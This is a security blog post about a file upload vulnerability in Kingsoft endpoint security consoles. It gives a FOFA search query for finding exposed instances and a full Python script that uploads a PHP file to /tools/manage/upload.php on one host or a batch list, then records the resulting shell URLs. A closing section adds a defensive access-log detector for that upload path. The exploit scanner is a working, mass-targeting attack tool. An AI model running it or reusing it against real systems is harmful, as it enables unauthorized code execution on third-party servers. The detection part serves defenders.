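FOFA URL: fofa.so
FOFA search: title="金山终端安全"
Open any one of the results; the port is 6868.
The PoC confirms that the vulnerability exists: the upload succeeds.
Python script: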
```python
import requests

headers = {
    "Content-Type": "multipart/form-data;boundary=----WebKitFormBoundaryhQcaKJIKAnejKGru"
}
payload = '''------WebKitFormBoundaryhQcaKJIKAnejKGru
Content-Disposition: form-data; name="file";filename="21232f297a57a5a743894a0e4a801f13.php"
Content-Type: image/png

<?php phpinfo();?>
------WebKitFormBoundaryhQcaKJIKAnejKGru--'''


def multi():
    f = open("ips.txt", "r")
    path = "/tools/manage/upload.php"
    for ip in f.readlines():
        ip = ip.replace("\n", "")
        url = "http://{}{}".format(ip, path)
        f_exist = open("存在漏洞.txt", "a+")  # results file ("vulnerable.txt")
        # print(url)
        try:
            res = requests.post(url=url, data=payload, headers=headers)
            # print(res.text)
            if res.text.find("File is valid, and was successfully uploaded") != -1:
                # print("upload success")
                file = "http://{}/Uploaddir/21232f297a57a5a743894a0e4a801f13.php".format(ip)
                print(file)
                f_exist.writelines(file)
                f_exist.writelines("\n")
            else:
                print("不存在此漏洞")  # "not vulnerable"
            f_exist.close()
        except Exception as e:
            print("请求异常-------", e.args)  # "request error"


def single():
    f_exist = open("存在漏洞.txt", "w+")  # results file ("vulnerable.txt")
    path = "/tools/manage/upload.php"
    ip = input("目标ip = ")  # "target ip"
    ip = ip.replace(" ", "")
    url = "http://{}{}".format(ip, path)
    # print(url)
    try:
        res = requests.post(url=url, data=payload, headers=headers)
        # print(res.text)
        if res.text.find("File is valid, and was successfully uploaded") != -1:
            # print("upload success")
            file = "存在漏洞,shell:http://{}/Uploaddir/21232f297a57a5a743894a0e4a801f13.php".format(ip)
            print(file)
            f_exist.writelines(file)
            f_exist.writelines("\n")
        else:
            print("不存在此漏洞")  # "not vulnerable"
        f_exist.close()
    except Exception as e:
        print("请求异常-------", e.args)  # "request error"


if __name__ == '__main__':
    # Menu text: "Enter the matching number: 1. verify a single URL,
    # 2. batch verification from a text file (ips.txt, one ip:port per line)"
    info = '''
    ****************************************
    ****************************************
    ****************************************
    ***请输入对应数字:                   ***
    ***1.针对单个url验证                 ***
    ***2.批量文本验证(ips.txt 每行eg:ip:port)
    ****************************************
    ****************************************
    ****************************************
    '''
    select = input(info)
    info.replace(" ", "")
    if 1 == int(select):
        while (1):
            single()
    elif 2 == int(select):
        multi()
    else:
        print("选项异常 ", select)  # "invalid option"
```
Supports verification of a single IP and batch scanning:
Do not use this for illegal purposes.
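For defenders, the two requests the script above makes leave a recognizable pair in the web access log. The following is an added example, not part of the original post: it flags POSTs to the upload endpoint and requests for script files under the upload directory. The "combined" access-log format and the sample log lines are assumptions constructed for illustration; only the two paths and the file name come from the post.

```python
import re

# Paths taken from the PoC in this post.
UPLOAD_PATH = "/tools/manage/upload.php"
UPLOAD_DIR = "/uploaddir/"

# Assumption: the web server writes Apache/nginx "combined" format logs.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions that a PHP-enabled server may execute.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2021:09:01:12 +0800] "POST /tools/manage/upload.php HTTP/1.1" 200 61 "-" "python-requests/2.25.1"',
    '198.51.100.7 - - [10/Apr/2021:09:01:13 +0800] "GET /Uploaddir/21232f297a57a5a743894a0e4a801f13.php HTTP/1.1" 200 90211 "-" "python-requests/2.25.1"',
    '192.0.2.10 - - [10/Apr/2021:09:02:00 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Apr/2021:09:05:40 +0800] "GET /Uploaddir/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def find_upload_abuse(lines):
    """Return (kind, client_ip, path, status) tuples for suspicious requests."""
    uploaders = set()  # clients that have POSTed to the upload endpoint
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        path = m["uri"].split("?", 1)[0]
        lowered = path.lower()
        if m["method"] == "POST" and lowered == UPLOAD_PATH:
            uploaders.add(m["ip"])
            findings.append(("upload_post", m["ip"], path, m["status"]))
        elif lowered.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(lowered):
            # A script served from the upload directory is suspicious by itself;
            # confidence is higher when the same client uploaded earlier.
            kind = "script_after_upload" if m["ip"] in uploaders else "script_in_uploaddir"
            findings.append((kind, m["ip"], path, m["status"]))
    return findings


if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

A 200 status on a script_after_upload finding means the uploaded file was served, so the upload directory on that host should be inspected on disk.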
Source: freebuf.com 2021-04-10 09:15:50 by: 阿刁123456